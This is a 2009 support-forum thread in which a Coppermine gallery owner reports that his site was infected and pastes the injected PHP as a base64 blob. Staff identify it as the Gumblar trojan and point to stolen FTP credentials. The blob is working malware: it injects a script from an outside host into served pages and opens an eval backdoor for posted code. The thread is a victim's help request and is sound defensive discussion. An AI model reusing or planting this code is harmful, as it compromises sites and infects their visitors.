Advanced search  

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Pages: [1]   Go Down

Author Topic: Trojans on 1.4.25  (Read 2743 times)

0 Members and 1 Guest are viewing this topic.

bjfs

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Trojans on 1.4.25
« on: October 25, 2009, 09:18:19 pm »

So I had a gallery (currently taken down) on 1.4.25 with register globals turned off and for some odd reason the PHP files got infected with this sinister code:

aWYoIWlzc2V0KCR2MHIxKSl7ZnVuY3Rpb24gdjByKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMjFwYTNsaGEzVXVhbkF2YldscmVXRnJkVEV2YjNKa1pYSXVjR2h3SUQ0OEwzTmpjbWx3ZEQ0PScpLCcnLCRzKTtpZihzdHJpc3RyKCRzLCc8Ym9keScpKSRzPXByZWdfcmVwbGFjZSgnIyhccyo8Ym9keSkjbWknLCRhLidcMScsJHMpO2Vsc2VpZihzdHJwb3MoJHMsJyxhJykpJHMuPSRhO3JldHVybiAkczt9ZnVuY3Rpb24gdjByMigkYSwkYiwkYywkZCl7Z2xvYmFsICR2MHIxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCR2MHIxKSljYWxsX3VzZXJfZnVuYygkdjByMSwkYSwkYiwkYywkZCk7Zm9yZWFjaChAb2JfZ2V0X3N0YXR1cygxKSBhcyAkdilpZigoJGE9JHZbJ25hbWUnXSk9PSd2MHInKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgndjByJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JHYwcmw9KCgkYT1Ac2V0X2Vycm9yX2hhbmRsZXIoJ3YwcjInKSkhPSd2MHIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=


Which decodes to evaluation of some nasty site-wide infections of HTML, HTM and JS files with a link to a trojan in the mikyaku.jp domain.

The only mod I used was the captcha one. I tried many things, upgrading from 1.4.34 (wiping the whole code first, where only albums remain) and realising that the host had register globals on by default.

I'm tired of cleaning the site with global search and replace, re-installing and having the incident happen again after a week or two. Maybe 1.5 will be better  :P

There is no link because the gallery is dead.
Logged

phill104

  • Administrator
  • Coppermine addict
  • *****
  • Country: gb
  • Offline Offline
  • Gender: Male
  • Posts: 4886
    • Windsurf.me
Re: Trojans on 1.4.25
« Reply #1 on: October 25, 2009, 09:41:40 pm »

Coppermine may not be the rout the hackers got in. There are many methods. What other php driven software do you have installed, have you been a victim of an attack before and not fully cleaned up, are you on a shared host whete somebody elses site was the one at risk but the scumbag managed access to the whole server. As you can see, it is very hard to se exactly where the problem occured without more information.

If possible, get yuor host to check the server logs as these should help track down where the leak was. If it can be show that coppermine was the point of entry, please post details here so we can look into it.
Logged
It is a mistake to think you can solve any major problems just with potatoes.

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: Trojans on 1.4.25
« Reply #2 on: October 26, 2009, 07:45:20 am »

Sounds like the Trojan Gumblar in action on your site (I figured this out searching for mikyaku.jp, which lead to http://www.malwaredomainlist.com/update.php). While it's sad to hear that your site got infected, there is no saying how the attack was carried out, so you can not (yet) blame coppermine to be the weakness where the attacker got in.

Here are some articles on Gumblar:
To me it seems that attack is carried out using FTP access. In other words: the attackers retrieved your FTP data (maybe they have been trivial or your PC is infected and subsequently you have fallen victim to a keylogger). Therefore, probably it was not a weakness in coppermine that let the attacker in. Please be very carefull when blaming people to provide buggy code, especially if you don't have the skills to judge.

Joachim
Logged

bjfs

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: Trojans on 1.4.25
« Reply #3 on: October 26, 2009, 09:39:16 am »

Right. So the only PHP file left was just outputting the service closure text and few hours later again the malicious code was added to it. Oh well, this is what you get while having a shared host and share account with other people. Make lame rants on the society with a death wish after one is out of ideas. Ok, so I'm lame today. Happens ::)
Logged
Pages: [1]   Go Up
 

Page created in 0.038 seconds with 19 queries.